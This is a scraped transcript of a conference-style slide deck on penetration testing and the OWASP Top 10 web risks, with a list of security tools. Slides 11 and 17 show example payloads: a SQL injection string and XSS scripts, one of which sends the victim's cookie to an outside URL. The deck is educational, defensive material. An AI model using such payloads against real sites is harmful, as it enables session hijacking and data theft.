Presentation is loading. Please wait.

Presentation is loading. Please wait.

Penetration Testing following OWASP

Published byEugenia Lewis Modified over 5 years ago

Similar presentations

Presentation on theme: "Penetration Testing following OWASP"— Presentation transcript:

1 Penetration Testing following OWASP
Boyan Yanchev – Chief Technology Officer Peter Dimkov – IS Consultant

2 За Лирекс

3 “Penetration testing”
A method of compromising the security of a computer system or network by simulating an attack by a malicious hacker.

4 Pentest Requirements by Standards
PCI-DSS Requirement 11: Regularly test security systems and processes. GDPR Article 32, 1 (d) - a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the procssing. ISO 27001 A.12.6 – Technical vulnerability management A.9.4 – System and application access control A – Protecting against external and environmental threats A.12.2 – Protection from malware A – System Security Testing …..

5 Types of “Penetration tests” (by target scope)
Vulnerability assessment Infrastructure Penetration tests Internal External WEB/Application Penetration tests Static WEB Site Dynamic content and applications Mobile application Penetration tests

6 Open Systems Interconnection model (OSI model)

7 Top 10 threats defined by OWASP for 2013
Open Web Application Security Project List of the Top 10 most critical WEB Application Security Risks The top 10 threats defined by OWASP for 2013 include: A1: Injection (Injection flaws, such as SQL, OS, and LDAP injection) A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Missing Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects and Forwards Totally free to use for personal and business use

8 OWASP Top 10 2017 RC2 – Released (20.10.2017)
OWASP Top RC1 – Rejected OWASP Top RC2 – Released ( ) New OWASP Top is to be released in late November 2017

9 Top 10 threats defined by OWASP for 2013
Author: Alan Zeichick Principal Analyst, Camden Associates

10 Data can be stolen, modified, deleted
A1. Injections Injection attacks occur when unvalidated input is embedded in an instruction stream Impact - SEVERE! Data can be stolen, modified, deleted Client-side controls can easily be bypassed by an attacker Related to: SQL LDAP Anything that builds up a query from a user input

11 SQL Injection – Illustrated (source: OWASP)
Account: SKU: Account: SKU: "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Account Summary Acct: Acct: Acct: Acct: HTTP response  DB Table  HTTP request SQL query Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Application Layer Databases Legacy Systems Web Services Directories Human Resrcs Billing APPLICATION ATTACK Custom Code 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to the database in a SQL query Web Server Hardened OS 4. Database runs query containing attack and sends encrypted results back to application Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user

12 Injection

13 A1. Injections Source:

14 A2. Broken Authentication and Session Management
Hijacking a user’s session HTTP is a “stateless” protocol which means that credentials have to go with every request SESSION ID used to track state.

15 A2. Broken Authentication and Session Management
Vulnerabilities: sessionIDs are being stored in the URL Guessable sessionIDs sessionIDs are not timing out Passwords are not stored hashed Credentials are sent over plain text

16 A3. Cross-Site Scripting (XSS)
The most prevalent web application security flaw Enables the attacker to execute scripts in victim’s browser Used to: steal user’s session; steal sensitive data; rewrite web page (insert malicious content); redirect user to phishing or malware site Be sure to sanitize your input fields!

17 A3. Cross-Site Scripting (XSS)
<script>alert(XSS Attack!)</script> <script>document.location= ' ?foo='+document.cookie</script>

18 A4. Insecure Direct Object References
Accessing data or system by changing a parameter value which refers to an object that the user is not authorized to access

19 A7. Missing Function Level Access Control
Threat: unauthorized access to functionality (Privileged escalation) Authorization checks are used in order to generate appropriate menus and/or show/hide various options If an attacker is aware of the presence of these other functions he could attempt to call them If the server does not check the permissions for this user, the privilege escalation is successful

20 A5. Security Misconfiguration
Attack vectors: Missing (outdated) patches; Misconfigurations; Use of default accounts; Use of unnecessary services and features; Unprotected files and directories; Error messages not customized or blocked

21 A5. Security Misconfiguration

22 A6. Sensitive Data Exposure
When high value data (passwords, credit card data, s, etc.) is not properly handled by the application and not adequately protected on the WEB Site Data Exposure is at serious risk! Evaluate the high value data Use encryption

23 A8. Cross-Site Request Forgery (CSRF)
An attacker can cause the victim to change their password, username, , send private message from victim’s account, steal money, order stuff with a click of a link Most frameworks have a mechanism to protect from CSRF

24 A9. Using Components with Known Vulnerabilities
Using things like framework libraries, plugins and such Components often run with the full privilege of the application Finding exploits for particular component (is components are not updated) Exploit the vulnerability Prevention: Write your own components Always update with the most current version

25 A10. Unvalidated Redirects and Forwards
The possibility of a WEB application to accept an untrusted input that could cause the WEB application to redirect to the request URL, contained within the untrusted input Launching phishing scams Stealing credentials

26 Tools Vulnearbility Assessment tools: Metasploit Framework
OpenVAS Acunetix Qualys Nessus Metasploit Framework The Pentesters Framework (PTF) Kali Linux Nmap AirCrack SQLMap Ethercap Wireshark Nikto/Wikto SiteDigger Proxies Paros Proxy OWASP ZAP Burp Suite Various Browser Plugins

27 Thank you!

Download ppt "Penetration Testing following OWASP"

Similar presentations

OWASP’s Ten Most Critical Web Application Security Vulnerabilities

OWASP’s Ten Most Critical Web Application Security Vulnerabilities
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
OWASP Web Vulnerabilities and Auditing

OWASP Web Vulnerabilities and Auditing
PENETRATION TESTING Presenters:Chakrit Sanbuapoh Sr. Information Security MFEC.

PENETRATION TESTING Presenters:Chakrit Sanbuapoh Sr. Information Security MFEC.
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
The OWASP Foundation OWASP Top 10 2010 Kuai Hinojosa Software Security Consultant at Cigital OWASP Global Education Committee OWASP.

The OWASP Foundation OWASP Top Kuai Hinojosa Software Security Consultant at Cigital OWASP Global Education Committee OWASP.
Hands on Demonstration for Testing Security in Web Applications

Hands on Demonstration for Testing Security in Web Applications
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Securing MVC.NET Web Applications Andrew Wilson. 오 안녕하세요 !!!! Senior Software Consultant Obsessed security guy OWASP co-lead Long walks on the beach desert.

Securing MVC.NET Web Applications Andrew Wilson. 오 안녕하세요 !!!! Senior Software Consultant Obsessed security guy OWASP co-lead Long walks on the beach desert.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Evolving Threats. Application Security - Understanding the Problem DesktopTransportNetworkWeb Applications Antivirus Protection Encryption (SSL) Firewalls.

Evolving Threats. Application Security - Understanding the Problem DesktopTransportNetworkWeb Applications Antivirus Protection Encryption (SSL) Firewalls.
Introduction to Application Penetration Testing

Introduction to Application Penetration Testing
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March

Similar presentations

Ads by Google